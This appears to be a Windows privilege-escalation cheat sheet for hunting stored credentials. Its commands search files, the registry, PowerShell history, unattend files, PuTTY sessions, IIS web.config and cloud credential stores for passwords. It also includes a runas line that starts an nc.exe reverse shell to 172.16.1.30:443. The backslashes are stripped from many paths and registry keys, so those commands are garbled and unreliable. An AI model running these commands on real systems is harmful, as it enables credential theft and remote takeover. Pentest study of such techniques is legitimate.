Common Commands and searches
Search for hidden files
- dir /a C:
Search for file names and contents
- dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* == *user*
- findstr /SI “passw pwd” *.xml *.ini *.txt *.ps1 *.bat *.config
- dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Search for passwords in registry
- reg query HKLM /f password /t REG_SZ /s
- reg query HKLU /f password /t REG_SZ /s
Read the Registry
- reg query “HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon”
- reg query “HKLMSYSTEMCurrentControlSetServicesSNMP”
- reg query “HKCUSoftwareSimonTathamPuTTYSessions”
- reg query “HKCUSoftwareORLWinVNC3Password”
- reg query HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4 /v password
- reg query “HKCUSoftwareORLWinVNC3Password”
- reg query “HKCUSoftwareTightVNCServer”
- reg query “HKCUSoftwareOpenSSHAgentKeys”
Hunting for SAM and SYSTEM Backups
- cd C: & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK
Check permissions
- icacls “C:WindowsSystem32ConfigRegback”
Interesting locations
- C:Windowssysprepsysprep.xml
- C:Windowssysprepsysprep.inf
- C:Windowssysprep.inf
- C:WindowsPantherUnattended.xml
- C:WindowsPantherUnattend.xml
- C:WindowsPantherUnattendUnattend.xml
- C:WindowsPantherUnattendUnattended.xml
- C:WindowsSystem32Sysprepunattend.xml
- C:WindowsSystem32Sysprepunattended.xml
- C:unattend.txt
- C:unattend.inf
- VARIABLES.DAT
- setupinfo
- setupinfo.bak
- web.config
- SiteList.xml
- .awscredentials
- .azureaccessTokens.json
- .azureazureProfile.json
- gcloudcredentials.db
- gcloudlegacy_credentials
- gcloudaccess_tokens.db
Chrome Password
- gc ‘C:UsersuserAppDataLocalGoogleChromeUser DataDefaultCustom Dictionary.txt’ | Select-String password
Unattended Windows Installations
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don’t require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:
- C:Unattend.xml
- C:WindowsPantherUnattend.xml
- C:WindowsPantherUnattendUnattend.xml
- C:Windowssystem32sysprep.inf
- C:Windowssystem32sysprepsysprep.xml
Powershell History
Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved by using the following command from a cmd.exe prompt:
- type %userprofile%AppDataRoamingMicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt
- type C:UsersbobAppDataRoamingMicrosoftWindowsPowerShellPSReadLineConsoleHost_history.txt
- (Get-PSReadLineOption).HistorySavePath
- gc (Get-PSReadLineOption).HistorySavePath
- foreach($user in ((ls C:users).fullname)){cat “$userAppDataRoamingMicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt” -ErrorAction SilentlyContinue}
Note: The command above will only work from cmd.exe, as Powershell won’t recognize %userprofile% as an environment variable. To read the file from Powershell, you’d have to replace %userprofile% with $Env:userprofile
Saved Windows Credentials
Windows allows us to use other users’ credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:
- cmdkey /list
While you can’t see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.
- runas /savecred /user:admin cmd.exe
- runas /env /noprofile /savecred /user:DESKTOP-T3I4BBKadministrator “c:tempnc.exe 172.16.1.30 443 -e cmd.exe”
IIS Configuration
Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:
- C:inetpubwwwrootweb.config
- C:WindowsMicrosoft.NETFramework64v4.0.30319Configweb.config
Here is a quick way to find database connection strings on the file:
- type C:WindowsMicrosoft.NETFramework64v4.0.30319Configweb.config | findstr connectionString
Retrieve Credentials from Software: PuTTY
PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection’s parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won’t allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.
To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:
- reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessions /f “Proxy” /s